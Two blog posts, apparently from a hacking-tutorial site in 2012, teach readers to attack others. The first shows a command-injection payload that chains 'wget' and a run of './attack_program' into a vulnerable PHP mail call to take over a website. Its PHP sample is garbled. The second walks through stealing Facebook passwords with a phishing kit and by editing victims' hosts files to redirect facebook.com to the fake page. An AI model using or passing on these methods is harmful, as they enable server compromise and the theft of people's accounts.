New Post


Saturday, February 11, 2012
Hack websites using Command Injection

Hack websites using Command Injection

Hey friends, previously i have explained how to use SQL injection and XPath Injection to hack websites. Today i will teach you another type of injection technique that if executed properly can give you complete ownership of victim's website, called Command Injection. When user input is used as a part of system command, an hacker may inject system commands into the user input..Ahh..confusing...:P Lets understand in clear and simple words..

What is Command Injection?
Command injection is an attack method in which we alters the dynamically generated content on a Web page by entering shell commands into an input mechanism, such as a form field that lacks effective validation constraints. We can exploit that vulnerability to gain unauthorized access to data or network resources. When users visit an affected Web page, their browsers interpret the code, which may cause malicious commands to execute in the users' computers and across their networks. The purpose of the command injection attack is to inject and execute commands specified by the attacker in the vulnerable website. In situation like this, the application, which executes unwanted system commands, is like a pseudo system shell, and the attacker may use it as any authorized system user. However, commands are executed with the same privileges and environment as the application has. Command injection attacks are possible in most cases because of lack of correct input data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers etc.).

hack websites using command injection
Command Injection Tutorial for Hackers

This can happen in any programming language but its very common in PERL, PHP and shell based CGI. It is less common in Java, Python and C++ ..:P i haven't tried it yet there :D tried once or twice but not able to do so, that why uncommon..:P.

Lets understand things using examples
Consider the below PHP code:
$email_subject ="Welcome to HackingLoops";

if  ( isset ($_GET {'email'} ) ) {
system( "mail " + $_GET {'email'}) + "-s ' " + $email_subject +
" ' < /tmp/email_body", $return_val);
The above code is an example where user sends his or her email address in the email parameter, and that user input is directly placed in the system command. Ahh... loophole...
Now similar to SQL injection or XPath injection, our goal is to inject the shell command into the email parameter but make sure code before and after the email parameter remain syntactically correct otherwise the injection will not execute.
Consider the system( ) call as small jigsaw puzzle game where we arrange different puzzle part to make a single image. All the parts except one part are on its place, now we have to find the middle part to finish the puzzle.. :D simple task in game but little tricky in command injection. So our objective is something shown below:
mail  [missing puzzle part]  -s  'Welcome to HackingLoops'  </tmp/email_body
Note: For the missing puzzle part, we need to ensure that the mail command runs properly and exits properly basically i want to focus on syntax, it should be syntactically correct.

For example mail  --help will runs and exits properly. Now we can add other additional shell commands by separating the commands by a semi colon (;).
We can also comment the missing puzzle part using the shell commenting symbol (#) in front. So we can manipulate the missing puzzle part as below:
--help; wget;  ./attack_program #
Now the adding our missing puzzle part to our original existing shell command, the below shell command is created:
mail --help; wget; ./attack_program # s 'Welcome to HackingLoops' < /tmp/email_body

This resulting command is equivalent to below command:
mail --help; wget; ./attack_program
Now what the above command will do..:P You all guys are just reading things like novice hackers.. Any Guess...:P ok..let me explain..
The above shell command will runs the mail --help and then downloads the attack program from  and executes it on victim, allowing the hacker to perform the arbitrary commands on the vulnerable website. In most cases provide the complete access to the root directory..:P Now do whatever you want to do..
That's all my friends. I hope that you all have enjoyed the tutorial, if you have any doubts or queries ask me in form of comments.
Copy Cats its last warning from HackingLoops, stop copying our articles, if you copy articles always mention the source. Otherwise get ready for DMCA penalty and negative rating on Google.

Friday, February 3, 2012
How to Hack Facebook account or password

How to Hack Facebook account or password

Facebook is becoming secured day by day, it daily fixes several bugs found by users. Recently we have noticed that it has also tried to fix the Phishing loophole by validating the previous URL from which the user is arriving to Facebook. It validates from which source user is arriving on Facebook and hence if its a fake Facebook Page, it warns its users that Please Change your Password Immediately as you might be a victim of Phishing. This validation made Facebook account passwords secured from thousands of Novice and Script Kiddie Hackers but L33T  still can't be stopped, as L33Ts never stop, they keep on moving to new alternatives.
So we moved to advanced mode of Phishing like Tabnabbing, meta refresh trick, browser side bypassing and even manipulating host(hint is sufficient as i will not disclose this one)..when i feel bored i use this technique to hack accounts and passwords of Facebook. Just try to figure out what we can do using Host File :P ..Not going to tell more than that...
Ok.... Ok... Lets learn today the technique called Host Name IP mapped based Phishing. You all will be really happy to know that i have written my third white paper on the same topic and you will be more than happy by knowing that this technique of Phishing is invented by Lokesh Singh (:P none other than me...).. So friends lets start our tutorial.

hack facebook account password, hacking facebook accounts
How to hack Facebook account and passwords

Note: This is for Educational Purposes only. Don't misuse it.:P Please...

1. Facebook latest Phisher or Fake Pages.
Download Latest Facebook Phisher here: Download Now
2. Free Web hosting server to upload those Phish Pages.
3. Spoofing URL using Host name mapping technique.

Let me provide you little background what i will teach you today. I know most of you already know phishing but for first timers, let me explain a bit. Phish Pages means Fake Pages that looks absolutely similar to original pages and the technique of using those Fake pages to hack anyone's user name and password is called Phishing. And technique which we use to send these fake pages to victim and prompt him to believe that they are real is called Social Engineering. But i think this we already know, what's new we are going to discuss today.. Ahhh... Just wait and hold your pants tight because today i will be breaking all the policies and ethical norms because until and unless we don't know how hackers do things we will never able to stand in front of them.

What is New???
We all know that fake pages can only be detected using two techniques:
1. Verifying the URL in the address bar, if its a fake page then URL must be different from original one.
2. Using any web security toolbar that warns users for fake pages like AVG toolbar, Norton Online security toolbar etc..
But what if you open manually in your web browser and fake page opens and URL in the web browser remains only. That means first technique to detect fake page go in vain. Now for second technique, all online web security toolbar detect fake pages by comparing the input  by user in URL address bar and original page URL. If both matches then its not a fake page else its a malware page. 
So friends today i will teach you how to make your fake pages open whenever victim opens Facebook in his/her web browser. Ahhh... You will be now thinking its impossible. But as i have told you i have written a white paper on Advanced Phishing techniques. So its 110% possible to load fake web page whenever user opens or any other website like Yahoo, Hotmail or anything... Below are the steps and video for the same.
I had made the video as well as written the steps in detail which will tell you everything step by step.

Steps to Hack Facebook account or Password:
1. Download the Latest Facebook Phisher.
2. Extract the files, you will get below 4 files:

  • index.php
  • facebook1.php
  • passwords.html
  • thanks.php
3. Now go to any free web hosting web server to upload these fake pages. 
Note all should be uploaded at root means not in any folder. Just at first level directory.

4. Now you need to find the correct IP address of the account you have created on web hosting server.
5. When you get you fake page's IP address, now what we need to do is that we have to add the entry of the IP address against the in victim's host file located at below location.
6. There are several ways of doing that, i have written my own php scripts for doing the same but i cannot share that with you guys because there are chances of misusing it. So i explain you the logic and rest you need to figure out how you will edit victims host file and append your Fake Page IP address against

7. Now after doing steps 5 and 6, whenever user open the, your fake Facebook page will open and victim will never be able to visit the original Facebook, so he cannot even been able to change his password...:P

8. I have added an extra logic to my scripts, whenever victim enter the password and hit enter button, i am removing the entry of Fake IP address against from the host file by making it spaces. So it will be for him for one time only which sounds more spoofed. Its just a single line code but i cannot tell you guys because it will make this article completely unethical. 
I will teach you techniques but i will not do spoon feeding because if you want to become good hacker then you need to use your brain too. I love to be called Destructive but i do constructive works..:P like this one...rofl...

9. Everything other than this is similar to normal phishing technique..

I hope you all like it... If not here is the video of the complete hack in detail with each and every step shown practically. 
Note: In video i am using my localhost as web server which in your case will be or other means where you uploaded your files.
Also you must know is localhost IP address. For you case your webhosting will be the IP address that will be used to map against facebook.
Ok now lets watch the video..
or simply download it

Right Click on video to view play pause forward controls:

I hope you all love this tutorial :P you have to... Because its the best method for hacking anyone's account..
At least i can hope this article deserves a big smile on you face with looks of being shocked and a appreciation comment that will make me smile...:D
Designed by Hackingloops.